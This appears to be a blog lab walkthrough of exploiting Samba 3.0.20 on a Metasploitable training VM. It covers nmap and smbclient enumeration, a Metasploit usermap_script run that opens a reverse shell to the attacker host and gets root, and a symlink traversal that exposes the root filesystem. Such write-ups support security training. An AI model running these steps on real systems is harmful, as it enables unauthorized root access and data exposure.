Lets first start off with an nmap scan of the remote host.
root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-07 12:08 MST Nmap scan report for 192.168.56.101 Host is up (0.00030s latency). PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) MAC Address: 08:00:27:AA:7E:5A (Oracle VirtualBox virtual NIC) Host script results: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user:, NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2020-02-07T14:08:36-05:00 |_smb2-time: Protocol negotiation failed (SMB2) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds root@ubuntu:~#
As you can see we have both ports open and the samba share service running on the remote host. Our next task is to query the samba server and try and mount a share.
sam@ubuntu:~$ smbclient -L //192.168.56.101 WARNING: The "syslog" option is deprecated Enter WORKGROUP\sam's password: Anonymous login successful Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) Reconnecting with SMB1 for workgroup listing. Anonymous login successful Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP sam@ubuntu:~$
We see that there are two shares tmp and opt. We cannot access opt as it is password protected but we can mount /tmp with out problem.
sam@ubuntu:~$ smbclient //192.168.56.101/tmp WARNING: The "syslog" option is deprecated Enter WORKGROUP\sam's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Feb 7 12:03:16 2020 .. DR 0 Sun May 20 13:36:12 2012 .ICE-unix DH 0 Fri Feb 7 11:56:45 2020 .X11-unix DH 0 Fri Feb 7 11:57:08 2020 .X0-lock HR 11 Fri Feb 7 11:57:08 2020 4529.jsvc_up R 0 Fri Feb 7 11:57:21 2020 7282168 blocks of size 1024. 5436104 blocks available smb: \>
Theres nothing interesting in the tmp folder just some temporary files the operating system has stuck there. lets move on the exploit the remote samba service.
Samba usermap_script
In metasploit it gives us alot of options when attacking the samba share service. One of those modules which we will be using is the usermap_script module. If all goes well we should get back a shell.
msf5 > use exploit/multi/samba/usermap_script msf5 exploit(multi/samba/usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 139 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.56.101 RHOSTS => 192.168.56.101 msf5 exploit(multi/samba/usermap_script) > run [*] Started reverse TCP double handler on 192.168.56.1:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo edd61L0j1w8uZUtm; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "edd61L0j1w8uZUtm\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:52751) at 2020-02-07 12:01:02 -0700 id uid=0(root) gid=0(root) python -c 'import pty;pty.spawn("/bin/bash")' root@metasploitable:/#
As you can see we got back a root shell with this exploit.
Samba Symlink Traversal
Our next task is to exploit the symlink traversal vulnerabilty. Lets fire up metasploit and give it a go.
msf5 exploit(multi/samba/usermap_script) > use auxiliary/admin/smb/samba_symlink_traversal msf5 auxiliary(admin/smb/samba_symlink_traversal) > show options Module options (auxiliary/admin/smb/samba_symlink_traversal): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 445 yes The SMB service port (TCP) SMBSHARE yes The name of a writeable share on the server SMBTARGET rootfs yes The name of the directory that should point to the root filesystem msf5 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.56.101 RHOSTS => 192.168.56.101 msf5 auxiliary(admin/smb/samba_symlink_traversal) > run [*] Running module against 192.168.56.101 [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: SMBSHARE. msf5 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp SMBSHARE => tmp msf5 auxiliary(admin/smb/samba_symlink_traversal) > run [*] Running module against 192.168.56.101 [*] 192.168.56.101:445 - Connecting to the server... [*] 192.168.56.101:445 - Trying to mount writeable share 'tmp'... [*] 192.168.56.101:445 - Trying to link 'rootfs' to the root filesystem... [*] 192.168.56.101:445 - Now access the following share to browse the root filesystem: [*] 192.168.56.101:445 - \\192.168.56.101\tmp\rootfs\ [*] Auxiliary module execution completed msf5 auxiliary(admin/smb/samba_symlink_traversal) >
Now we need to load up the /tmp directory on the samba share and see if the folder 'rootfs' is in the folder.
root@ubuntu:~# smbclient //192.168.56.101/tmp WARNING: The "syslog" option is deprecated Enter WORKGROUP\root's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Feb 7 12:16:32 2020 .. DR 0 Sun May 20 13:36:12 2012 .ICE-unix DH 0 Fri Feb 7 11:56:45 2020 .X11-unix DH 0 Fri Feb 7 11:57:08 2020 .X0-lock HR 11 Fri Feb 7 11:57:08 2020 rootfs DR 0 Sun May 20 13:36:12 2012 4529.jsvc_up R 0 Fri Feb 7 11:57:21 2020 7282168 blocks of size 1024. 5436096 blocks available smb: \> cd rootfs smb: \rootfs\> ls . DR 0 Sun May 20 13:36:12 2012 .. DR 0 Sun May 20 13:36:12 2012 initrd DR 0 Tue Mar 16 17:57:40 2010 media DR 0 Tue Mar 16 17:55:52 2010 bin DR 0 Sun May 13 22:35:33 2012 lost+found DR 0 Tue Mar 16 17:55:15 2010 mnt DR 0 Wed Apr 28 15:16:56 2010 sbin DR 0 Sun May 13 20:54:53 2012 initrd.img R 7929183 Sun May 13 22:35:56 2012 home DR 0 Fri Apr 16 01:16:02 2010 lib DR 0 Sun May 13 22:35:22 2012 usr DR 0 Tue Apr 27 23:06:37 2010 proc DR 0 Fri Feb 7 11:56:30 2020 root DR 0 Fri Feb 7 11:57:07 2020 sys DR 0 Fri Feb 7 11:56:31 2020 boot DR 0 Sun May 13 22:36:28 2012 nohup.out R 9426 Fri Feb 7 11:57:08 2020 etc DR 0 Fri Feb 7 11:57:02 2020 dev DR 0 Fri Feb 7 11:56:45 2020 vmlinuz R 1987288 Thu Apr 10 11:55:41 2008 opt DR 0 Tue Mar 16 17:57:39 2010 var DR 0 Wed Mar 17 09:08:23 2010 cdrom DR 0 Tue Mar 16 17:55:51 2010 tmp D 0 Fri Feb 7 12:16:32 2020 srv DR 0 Tue Mar 16 17:57:38 2010 7282168 blocks of size 1024. 5436096 blocks available smb: \rootfs\>
As you can see we got the rootfs folder with the contents of the root filesytem right there for us to browse through.
No comments:
Post a Comment